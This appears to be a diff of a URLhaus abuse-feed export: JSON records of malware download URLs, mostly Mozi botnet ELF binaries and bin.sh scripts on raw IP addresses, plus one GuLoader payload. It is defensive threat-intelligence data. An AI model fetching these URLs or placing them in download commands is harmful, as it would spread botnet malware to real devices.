+{"id":"961356","urlhaus_reference":"https://urlhaus.abuse.ch/url/961356/","url":"http://89.160.20.156:34541/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961357","urlhaus_reference":"https://urlhaus.abuse.ch/url/961357/","url":"http://89.160.20.156:51344/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961358","urlhaus_reference":"https://urlhaus.abuse.ch/url/961358/","url":"http://89.160.20.156:40084/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961359","urlhaus_reference":"https://urlhaus.abuse.ch/url/961359/","url":"http://89.160.20.156:60457/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961360","urlhaus_reference":"https://urlhaus.abuse.ch/url/961360/","url":"http://89.160.20.156:34906/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961353","urlhaus_reference":"https://urlhaus.abuse.ch/url/961353/","url":"http://89.160.20.156:59847/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961352","urlhaus_reference":"https://urlhaus.abuse.ch/url/961352/","url":"http://89.160.20.156:47873/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 20:09:00 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961349","urlhaus_reference":"https://urlhaus.abuse.ch/url/961349/","url":"http://89.160.20.156:48645/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961350","urlhaus_reference":"https://urlhaus.abuse.ch/url/961350/","url":"http://89.160.20.156:36524/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961351","urlhaus_reference":"https://urlhaus.abuse.ch/url/961351/","url":"http://89.160.20.156:38726/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961345","urlhaus_reference":"https://urlhaus.abuse.ch/url/961345/","url":"http://89.160.20.156:41149/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961346","urlhaus_reference":"https://urlhaus.abuse.ch/url/961346/","url":"http://89.160.20.156:46993/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961347","urlhaus_reference":"https://urlhaus.abuse.ch/url/961347/","url":"http://89.160.20.156:39190/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961348","urlhaus_reference":"https://urlhaus.abuse.ch/url/961348/","url":"http://89.160.20.156:48344/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961344","urlhaus_reference":"https://urlhaus.abuse.ch/url/961344/","url":"http://89.160.20.156:58427/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961343","urlhaus_reference":"https://urlhaus.abuse.ch/url/961343/","url":"http://89.160.20.156:41921/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:02:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961342","urlhaus_reference":"https://urlhaus.abuse.ch/url/961342/","url":"http://89.160.20.156:47140/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:55:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961341","urlhaus_reference":"https://urlhaus.abuse.ch/url/961341/","url":"http://89.160.20.156:34789/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:52:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961340","urlhaus_reference":"https://urlhaus.abuse.ch/url/961340/","url":"http://89.160.20.156:37634/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961339","urlhaus_reference":"https://urlhaus.abuse.ch/url/961339/","url":"http://89.160.20.156:41636/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961338","urlhaus_reference":"https://urlhaus.abuse.ch/url/961338/","url":"http://89.160.20.156:32907/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961336","urlhaus_reference":"https://urlhaus.abuse.ch/url/961336/","url":"http://89.160.20.156:57568/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961337","urlhaus_reference":"https://urlhaus.abuse.ch/url/961337/","url":"http://89.160.20.156:40740/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961331","urlhaus_reference":"https://urlhaus.abuse.ch/url/961331/","url":"http://89.160.20.156:35927/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961332","urlhaus_reference":"https://urlhaus.abuse.ch/url/961332/","url":"http://89.160.20.156:55558/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961333","urlhaus_reference":"https://urlhaus.abuse.ch/url/961333/","url":"http://89.160.20.156:60558/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961334","urlhaus_reference":"https://urlhaus.abuse.ch/url/961334/","url":"http://89.160.20.156:59624/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961335","urlhaus_reference":"https://urlhaus.abuse.ch/url/961335/","url":"http://89.160.20.156:39386/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961322","urlhaus_reference":"https://urlhaus.abuse.ch/url/961322/","url":"http://89.160.20.156:46289/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961323","urlhaus_reference":"https://urlhaus.abuse.ch/url/961323/","url":"http://89.160.20.156:34951/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961324","urlhaus_reference":"https://urlhaus.abuse.ch/url/961324/","url":"http://89.160.20.156:47594/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961325","urlhaus_reference":"https://urlhaus.abuse.ch/url/961325/","url":"http://89.160.20.156:55792/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961326","urlhaus_reference":"https://urlhaus.abuse.ch/url/961326/","url":"http://89.160.20.156:35271/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961327","urlhaus_reference":"https://urlhaus.abuse.ch/url/961327/","url":"http://89.160.20.156:36300/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961328","urlhaus_reference":"https://urlhaus.abuse.ch/url/961328/","url":"http://89.160.20.156:60680/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961329","urlhaus_reference":"https://urlhaus.abuse.ch/url/961329/","url":"http://89.160.20.156:51132/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961330","urlhaus_reference":"https://urlhaus.abuse.ch/url/961330/","url":"http://89.160.20.156:39049/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961321","urlhaus_reference":"https://urlhaus.abuse.ch/url/961321/","url":"http://89.160.20.156:57455/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:49:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961320","urlhaus_reference":"https://urlhaus.abuse.ch/url/961320/","url":"http://89.160.20.156:32823/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:49:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961318","urlhaus_reference":"https://urlhaus.abuse.ch/url/961318/","url":"http://89.160.20.156:44103/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961319","urlhaus_reference":"https://urlhaus.abuse.ch/url/961319/","url":"http://89.160.20.156:36257/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961317","urlhaus_reference":"https://urlhaus.abuse.ch/url/961317/","url":"http://89.160.20.156:41921/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:45:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961316","urlhaus_reference":"https://urlhaus.abuse.ch/url/961316/","url":"http://89.160.20.156:50971/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:44:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961315","urlhaus_reference":"https://urlhaus.abuse.ch/url/961315/","url":"http://89.160.20.156:56339/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:36:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961314","urlhaus_reference":"https://urlhaus.abuse.ch/url/961314/","url":"http://89.160.20.156:52551/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961312","urlhaus_reference":"https://urlhaus.abuse.ch/url/961312/","url":"http://89.160.20.156:35942/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961313","urlhaus_reference":"https://urlhaus.abuse.ch/url/961313/","url":"http://89.160.20.156:39636/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961310","urlhaus_reference":"https://urlhaus.abuse.ch/url/961310/","url":"http://89.160.20.156:53548/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961311","urlhaus_reference":"https://urlhaus.abuse.ch/url/961311/","url":"http://89.160.20.156:40967/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961309","urlhaus_reference":"https://urlhaus.abuse.ch/url/961309/","url":"http://89.160.20.156:49471/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961302","urlhaus_reference":"https://urlhaus.abuse.ch/url/961302/","url":"http://89.160.20.156:43937/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961303","urlhaus_reference":"https://urlhaus.abuse.ch/url/961303/","url":"http://89.160.20.156:57992/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961304","urlhaus_reference":"https://urlhaus.abuse.ch/url/961304/","url":"http://89.160.20.156:43603/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961305","urlhaus_reference":"https://urlhaus.abuse.ch/url/961305/","url":"http://89.160.20.156:37157/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961306","urlhaus_reference":"https://urlhaus.abuse.ch/url/961306/","url":"http://89.160.20.156:37229/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961307","urlhaus_reference":"https://urlhaus.abuse.ch/url/961307/","url":"http://89.160.20.156:49104/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961308","urlhaus_reference":"https://urlhaus.abuse.ch/url/961308/","url":"http://89.160.20.156:49575/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961299","urlhaus_reference":"https://urlhaus.abuse.ch/url/961299/","url":"http://89.160.20.156:50000/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961300","urlhaus_reference":"https://urlhaus.abuse.ch/url/961300/","url":"http://89.160.20.156:36251/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961301","urlhaus_reference":"https://urlhaus.abuse.ch/url/961301/","url":"http://89.160.20.156:51932/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961297","urlhaus_reference":"https://urlhaus.abuse.ch/url/961297/","url":"http://89.160.20.156:45660/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961298","urlhaus_reference":"https://urlhaus.abuse.ch/url/961298/","url":"http://89.160.20.156:42478/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961296","urlhaus_reference":"https://urlhaus.abuse.ch/url/961296/","url":"http://89.160.20.156:50726/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961295","urlhaus_reference":"https://urlhaus.abuse.ch/url/961295/","url":"http://89.160.20.156:40256/i","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:33:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961294","urlhaus_reference":"https://urlhaus.abuse.ch/url/961294/","url":"http://89.160.20.156:50971/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:29:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} {"id":"961293","urlhaus_reference":"https://urlhaus.abuse.ch/url/961293/","url":"https://realestatederivatives.com.ng/zx/janomo_hfWUGQvSPn0.bin","url_status":"online","host":"realestatederivatives.com.ng","date_added":"2021-01-14 19:24:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} -{"id":"961291","urlhaus_reference":"https://urlhaus.abuse.ch/url/961291/","url":"http://59.97.169.164:33946/Mozi.m","url_status":"offline","host":"59.97.169.164","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961292","urlhaus_reference":"https://urlhaus.abuse.ch/url/961292/","url":"http://58.249.13.69:39990/Mozi.a","url_status":"online","host":"58.249.13.69","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961288","urlhaus_reference":"https://urlhaus.abuse.ch/url/961288/","url":"http://61.52.86.202:60558/Mozi.m","url_status":"online","host":"61.52.86.202","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961289","urlhaus_reference":"https://urlhaus.abuse.ch/url/961289/","url":"http://61.52.76.45:32989/Mozi.a","url_status":"online","host":"61.52.76.45","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961290","urlhaus_reference":"https://urlhaus.abuse.ch/url/961290/","url":"http://61.52.26.66:52458/Mozi.m","url_status":"online","host":"61.52.26.66","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961286","urlhaus_reference":"https://urlhaus.abuse.ch/url/961286/","url":"http://203.212.246.231:60735/Mozi.m","url_status":"online","host":"203.212.246.231","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961287","urlhaus_reference":"https://urlhaus.abuse.ch/url/961287/","url":"http://186.33.104.197:34755/Mozi.m","url_status":"online","host":"186.33.104.197","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961285","urlhaus_reference":"https://urlhaus.abuse.ch/url/961285/","url":"http://41.86.19.146:39290/Mozi.m","url_status":"offline","host":"41.86.19.146","date_added":"2021-01-14 19:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961279","urlhaus_reference":"https://urlhaus.abuse.ch/url/961279/","url":"http://182.126.86.107:56141/Mozi.m","url_status":"online","host":"182.126.86.107","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961280","urlhaus_reference":"https://urlhaus.abuse.ch/url/961280/","url":"http://182.117.77.236:40247/Mozi.a","url_status":"online","host":"182.117.77.236","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961281","urlhaus_reference":"https://urlhaus.abuse.ch/url/961281/","url":"http://61.53.42.182:36619/i","url_status":"offline","host":"61.53.42.182","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961282","urlhaus_reference":"https://urlhaus.abuse.ch/url/961282/","url":"http://125.41.141.246:43673/Mozi.m","url_status":"online","host":"125.41.141.246","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961283","urlhaus_reference":"https://urlhaus.abuse.ch/url/961283/","url":"http://125.42.123.186:55726/Mozi.m","url_status":"online","host":"125.42.123.186","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961284","urlhaus_reference":"https://urlhaus.abuse.ch/url/961284/","url":"http://182.119.86.244:59668/Mozi.m","url_status":"online","host":"182.119.86.244","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961278","urlhaus_reference":"https://urlhaus.abuse.ch/url/961278/","url":"http://117.194.150.198:34391/Mozi.m","url_status":"online","host":"117.194.150.198","date_added":"2021-01-14 19:19:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961277","urlhaus_reference":"https://urlhaus.abuse.ch/url/961277/","url":"http://117.242.209.61:49478/Mozi.m","url_status":"online","host":"117.242.209.61","date_added":"2021-01-14 19:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961276","urlhaus_reference":"https://urlhaus.abuse.ch/url/961276/","url":"http://117.247.200.34:54670/Mozi.m","url_status":"offline","host":"117.247.200.34","date_added":"2021-01-14 19:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 